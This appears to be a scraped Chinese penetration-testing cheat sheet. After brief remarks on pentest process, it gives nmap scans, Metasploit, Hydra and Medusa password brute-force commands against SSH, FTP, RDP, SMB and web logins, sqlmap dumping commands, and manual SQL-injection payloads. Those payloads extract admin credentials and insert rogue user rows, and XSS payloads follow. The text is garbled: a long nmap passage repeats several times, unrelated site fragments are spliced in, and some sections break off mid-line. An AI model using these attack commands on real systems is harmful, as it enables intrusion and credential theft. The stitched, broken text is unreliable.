&&&&&&&&虽然中国的无线网络还处于建设时期,但是无线网络的部署及其简易,所以在一些大城市里的普及率已经很高了。在北京和上海的商务区内至少有80%的地方都可以找到接入点。
通过对无线网络的测试,可以判断企业局域网的安全性,这已经成为渗透测试中越来越重要的环节。
&&&&&&&&除了以上的测试手段以外,还有一些可能会在渗透测试过程中使用的技术,包括:社交工程学、拒绝服务攻击,以及中间人攻击。
从守方视角看渗透
当具备渗透测试攻击经验的人们站到系统管理员的角度,要保障一个大网的安全时,我们会发现,关注点是完全不同的。从攻方的视角看是“攻其一点,不及其余”,只要找到一个小漏洞,就有可能撕开整条战线;但如果你从守方的视角来看,就会发现往往是“千里之堤,毁于蚁穴”。因此,必须要有好的理论指引,从技术到管理都要注重安全,才能使网络固若金汤。
&&&&&&&&渗透测试的必要性
&&&&&&&&渗透测试利用网络安全扫描器、专用安全测试工具和富有经验的安全工程师的人工经验对网络中的核心服务及其重要的网络设备,包括服务器、网络设备、防火墙等进行非破坏性质的模拟黑客攻击,目的是侵入系统并获取机密信息并将入侵的过程和细节产生报告给用户,从而实现网络信息安全的防护。
&&&&&&&&渗透测试和工具扫描可以很好的互相补充。工具扫描具有很好的效率和速度,但存在一定的误报率和漏报率,并且不能发现高层次的、复杂的、并且相互关联的安全问题;而渗透测试则需要投入大量的人力资源、并且对测试者的专业技能要求很高(渗透测试报告的价值直接依赖于测试者的专业技能水平),但是非常准确,可以发现逻辑性更强、更深层次的弱点,效果更加的明显。
&&&&&&&&一般的渗透测试流程如下:
时间的选择
为减少渗透测试对网络和主机的负面影响,渗透测试的时间尽量安排在业务量不大的时段或者是晚上。
策略的选择
为了防止渗透测试造成网络和主机的业务中断的问题,在渗透测试的过程中尽量不使用含有拒绝服务的测试策略。
授权渗透测试的监测手段
在评估过程中,由于渗透测试的特殊性,用户可以要求对整体测试流程进行实时的监控(PS:可能会提高渗透测试的成本)。
测试方自控
由渗透测试方对本次测透测试过程中的三方面数据进行完整记录:操作、响应、分析,最终会形成完整有效的渗透测试报告并将其提交给用户。
用户监控一共有四种形式:
全程监控:采用类似Ethereal的嗅探软件进行全程抓包嗅探;
择要监控:对其扫描过程不进行录制,仅在安全工程师分析数据后,准备发起渗透前才开启软件进行嗅探;
主机监控:仅监控受测主机的存活状态,用以避免意外情况发生;
指定攻击源:用户指定由特定攻击源地址进行攻击,该源地址的主机由用户进行进程、网络连接、数据传输等多方面的监督控制。
&&&&&&&&(友情提示:文章中会出现与之前文章些许重复的情况,望各位亲包容,不过重复即是记忆。
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。拒绝访问 |
| 百度云加速
请打开cookies.
此网站 () 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(38dedd-ua98).
重新安装浏览器,或使用别的浏览器一、端口扫描工具
功能介绍及参数相关文档
1) 获取远程主机的类型及开放端口
nmap -sS -P0 -sV -O &target&
这里的 & target & 可以是单一 IP, 或主机名,或域名,或子网
-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统
-A 同时打开操作系统指纹和版本检测-v 详细输出扫描情况.
nmap -sS -P0 -A -v & target &
2) 列出开放了指定端口的主机列表
nmap -sT -p 80 -oG & 192.168.1.* | grep open
3) 在网络寻找所有在线主机
nmap -sP 192.168.0.*
或者也可用以下命令:
nmap -sP 192.168.0.0/24
指定 subnet
4) Ping 指定范围内的 IP 地址
nmap -sP 192.168.1.100-254
5) 在某段子网上查找未占用的 IP
nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp
6) 在局域网上扫找 Conficker 蠕虫病毒
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254
7) 扫描网络上的恶意接入点 (rogue APs).
nmap -A -p1-85,113,443, -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8
8 ) 使用诱饵扫描方法来扫描主机端口
sudo nmap -sS 192.168.0.10 -D 192.168.0.2
9) 为一个子网列出反向 DNS 记录
nmap -R -sL 209.85.229.99/27 | awk {if($3=="not")print"("$2") no PTR";else print$3" is "$2} | grep
10) 显示网络上共有多少台 &及 Win 设备?
sudo nmap -F -O 172.18.16.1-255 | grep "Running: " & /tmp/ echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) device"
nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)
二、中间人攻击arp工具
Ettercap:
三、破解工具
1.Metasploit:MSF破解ssh
msf:(全称)metasploit freamwork
使用命令: &&破解ssh登录名和密码 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
msconsole回车
search ssh &查找ssh相关的模块
use auxiliary/scanner/ssh/ssh_login &调用ssh破解程序 &&&&&&&&&&&&&&&
show options &&&查看选项
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)
set rport 22 &&&设置端口
set username root 设置用户名
set pass_file /root/*.* &设置密码文件
set threads 50 &&设置线程50
run &&开始执行
telnet同理,
kali自带密码字典路径//usr/share/wordlists/w3af.txt
注:所有路径必须是绝对路径nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)
MSF渗透扫描模块:
2.Hydra破解
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&=^PASS^:&title&wrong username or password&/title&"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,&title&中的内容是表示错误猜解的返回信息提示。)
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.&pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
参考网址:
3.Medusa暴力破解远程
kali &&linux自带破解工具,使用的时候要获得一些必要的信息。
1、目标IP地址
2、登录目标的一个用户名或者一个用户名文件(都是猜测的用户名也可以说是用户名字典)
3、密码字典
4、要验证的服务名称(比如ssh、http、telnet等)
使用命令:
&medusa -h target_ip(攻击ip) -u username -P path_to_passwordlist(密码文件要打绝对路径) -M
&authentication_service_to_attack(要验证的服务名称)
&-u是要攻击的目标的id(用户名)号,如果改为大写的U,将会是利用用户名列表进行攻击,-M参数后面接的是你要攻击的验证服务名称。
参考网址:/jingyan/1597226.html
4.payload破解
search tomcat查看tomcat的payload
payload就是加载模块调用攻击的有效加载项。(真心抽象)
msfconsole回车
use auxiliary/scanner/http/tomcat_mgr_login &&调用tomcat破解程序
show options &&&查看选项
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)
set rport 8080 &&&设置端口
set username root 设置用户名(set user_file /*/*.*设置帐号字典)
set pass_file /root/*.* &设置密码字典
set threads 50 &&设置线程50
run &&开始执行。
注:所有路径必须是绝对路径。
四.Sql注入工具
sqlmap:数据库注入工具。
可以用来猜测数据库类型和利用漏洞渗透数据库
注入点一般存在登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。
比如:最常用的寻找SQL注入点的方法,是在网站中寻找如下形式的页面链接:/xxx.asp?id=YY
&其中&YY&可能是数字,也有可能是字符串,分别被称为整数类型数据或者字符型数据。
一般有一下几种方法:
1、加 &' &法
浏览器可能会返回类似于下面的错误提示信息:Microsoft JET Database Engine 错误&80040e14表示有注入点。
2、and 1=1 和and 1=2 将and 1=1 写在url最后面访问显示正常,而and 1=2 提示错误说明有可能有注入点。如果两种方式结果一样,就表示没戏。
3、sqlmap下输入 &&(-u "域名" --level 5 --dbs) &猜测数据库类型
Sqlmap参数使用
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users &&查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
加入python环境使用方法:
sqlmap.py -u url &判断
sqlmap.py -u url --is-dba -v &这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 &这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T &表&-D &数据库&爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0&爆数据库
sqlmap.py -u url --users --password 爆用户名密码。
2.明小子Domain
明小子domian工具是针对Access、mssql数据库的sql注入工具,另外此工具可用于扫描管理后台、上传、下载路径,也可进行简单的md5破解!(此工具功能性有限)
使用方法:
1、先打开我们的明小子,在当前路径这里输入你要注入的网站地址,然后连接如下图。如果此网站有注入点的话,下面注入点框内会出现红色的注入点地址。
2、我们任意选中一个地址单击鼠标右键,点击检测注入。
3、然后点击开始检测按钮后,如下图操作。
最后我们得到网站的账号密码后 就可以去网站后台去登录了
3.Pangolin穿山甲
输入url地址进行检测
参考地址:/thread-758-1-1.html
4.纯手工sql注入
第一步先把IE菜单=&工具=&Internet选项=&高级=&显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
数字型:and 1=1 and 1=2 判断是否存在注入
字符型:' and '1'='1 ' and '1'='2
搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%
IIS报错情况下使用:
and user&0 (判断是ACCESS还是MSSQL)
不报错则使用各自数据库特性来判断
and (select count(*) from msysobjects)&0 (返回权限不足access数据库)
and (select count(*) from sysobjects)&0 (返回正常则为MSSQL数据库)
and db_name()&0 (返回数据库名)
and 0&&(select @@version)-- (判断版本信息)
and db_name()&0 (返回数据库名)
************注意:猜解之前先要找到后台地址,不然白忙了**********
ACCESS注入:
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from [admin])
and (Select Count(*) from Admin)&0
猜解字段:(字段username存在则正常,不正常则不存在)
and (Select username from Admin)&0
and exists (select username from [admin])
猜解用户名和密码长度
and (select top 1 len(username) from Admin)&0
and (select top 1 len(password) from Admin)&0
原 理:如果top 1的username长度大于0,则条件成立;接着就是&1、&2、&3这样测试下去,一直到条件不成立为止,比如&4成立,&5不成立,就是len(username)=5,即用户名长度为5.得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码.
and (select top 1 asc(mid(username,1,1)) from Admin)&0,1,2&,
当输入到109时,显示错误,而108之前显示正确,说明第一个字符的ASCII码为109.,得到第一个字符是m。
同理and (select top 1 asc(mid(username,2,1) from Admin)&0,1,2&
到114的时候不成立,说明第二个字符的ASCII码值为114,字符为r。
注意的是英文和数字的ASCII码在1-128之间...
MSSQL注入:
having 1=1-- 【爆出一个表名及字段,如:列 'users.ID' 在选择列表中无效】
group by users.ID having 1=1--
group by users.ID, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )-- 【插入新记录】
猜解表名:
SQL SERVER的每一个数据库都会有用户表和系统表,在系统表sysobjects中,数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在sysobjects表中占一行,那么也就是说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个,name (数据表的名字),xtype( 数据表的类型 u为用户表),id( 数据表的对象标志)。
and (select top 1 name from sysobjects where xtype='u')&0 (得到第一个表名:比如user)
and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))&0 得到第二个表名,后面的以此类推。。
猜解列名:
用 到系统自带的2个函数col_name()和object_id(),col_name()的格式是&COL_NAME( table_id , column_id )&,参数table_id是表的标识号,column_id是列的标识号,object_id(admin)就是得到admin在sysobjects 中的标识号,column_id=1,2,3表明admin的第1,2,3列。
and (select top 1 col_name(object_id('admin'),1) from sysobjects)&0 【得到admin字段的第一个列名&username&依次类推,得到&password&&id&等等】
猜解字段内容:
and (select top 1 username from [admin])&0 【直接得到用户名】
and (select top 1 password from [admin])&0 【直接得到密码】
UNION联合查询:
select name,password,id from user union select user,pwd,uid from 表名
and 1=1 union select 1,2,3,4,5... from 表名 (数值从1开始慢慢加,如果加到5返回正常,那就存在5个字段)
ASCII逐字解码法:
1、猜解列长度
and (select top 1 len(列名)from 表名)&N
其中N是数字,变换这个N的值猜解列长度,当N为6正确,为7错误,则长度为7
猜解第二条记录就该使用:select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)
2、猜解用户和密码
ASC()函数和Mid函数,ASC(mid(列名,N,1))得到&列名&第N位字符ASCII码
猜解语句为:and (select top 1 asc(mid(字段,1,1)) from 数据库名)&ASCII码
区间判断语句:....between......and......
中文处理法:当ASCII转换后为&负数&使用abs()函数取绝对值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码
ASCII逐字解码法的应用:
1、猜解表名:and (select count(*) from admin)&&0
2、猜解列名:and (select count(列名) from 表名)&&0
3、猜解用户个数:and (select count(*) from 表名)&1,2.. 2正常,3错误,表中有3条记录。
4、猜解用户名的长度:and (select len(列名) from 表名)&=1、&=2、&=3、&=4。
5、猜解用户名:and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)&&0
最后提交:and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到密码了。
MYSQL+PHP注入:
1.判断是否存在注入,加';and 1=1 ;and 1=2
2.判断版本 and ord(mid(version(),1,1))&51 代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)&0 onerror=alert(/xss/) width=150&&/img& ( 表示注释)
&img src=vbscript:msgbox ("xss")&&/img&
&style& input {left:expression_r (alert('xss'))}&/style&
&div style={left:expression_r (alert('xss'))}&&/div&
&div style={left:expression_r (alert('xss'))}&&/div&
&div style={left:\ression (alert('xss'))}&&/div&
html 实体 &div style={left:expression (alert('xss'))}&&/div&
unicode &div style="{left:expression_r (alert('xss'))}"&[/post]
参考地址:
五.Web扫描测试工具
1.绿盟RSAS远程安全评估系统
新建扫描任务(可输入单个IP地址,ip段,或者导入ip地址文件)
配置扫描项(登录检查、弱口令测试、端口扫描)
口令猜测详细配置项如下:
导出扫描报告,格式(html、word、pdf、excel),勾选单个主机报表项。
&2.Burpsuite
Burp Suite 是用于攻击 web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。Burp Suite 能高效率地与单个工具一起工作,例如:一个中心站点地图是用于汇总收集到的目标应用程序信息,并通过确定的范围来指导单个程序工作。在一个工具处理 HTTP 请求和响应时,它可以选择调用其他任意的 Burp 工具。例如,代理记录的请求可被 Intruder 用来构造一个自定义的自动攻击的准则,也可被 Repeater 用来手动攻击,也可被 Scanner 用来分析漏洞,或者被 Spider(网络爬虫)用来自动搜索内容。应用程序可以是&被动地&运行,而不是产生大量的自动请求。 Burp Proxy 把所有通过的请求和响应解析为连接和形式,同时站点地图也相应地更新。由于完全的控制了每一个请求,你就可以以一种非入侵的方式来探测敏感的应用程序。当你浏览网页(这取决于定义的目标范围)时,通过自动扫描经过代理的请求就能发现安全漏洞。IburpExtender 是用来扩展 Burp Suite 和单个工具的功能。一个工具处理的数据结果,可以被其他工具随意的使用,并产生相应的结果。
Burp Suite 工具箱Proxy&&是一个拦截 HTTP /S 的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Spider&&是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。Scanner[仅限专业版]&&是一个高级的工具,执行后,它能自动地发现 web 应用程序的安全漏洞。Intruder&&是一个定制的高度可配置的工具,对 web 应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用 fuzzing 技术探测常规漏洞。Repeater&&是一个靠手动操作来补发单独的 HTTP 请求,并分析应用程序响应的工具。Sequencer&&是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。Decoder&&是一个进行手动执行或对应用程序数据者智能解码编码的工具。
3.IBM appscan
下面打开appscan创建扫描。
选择常规扫描,进入配置向导。点击下一步,进入配置
上面这一步是重点,起始URL填写你要扫描的网址。其它服务器和域:这里把抽取的所有链接都添加进去。包括后网站的首页链接。点击下一步。
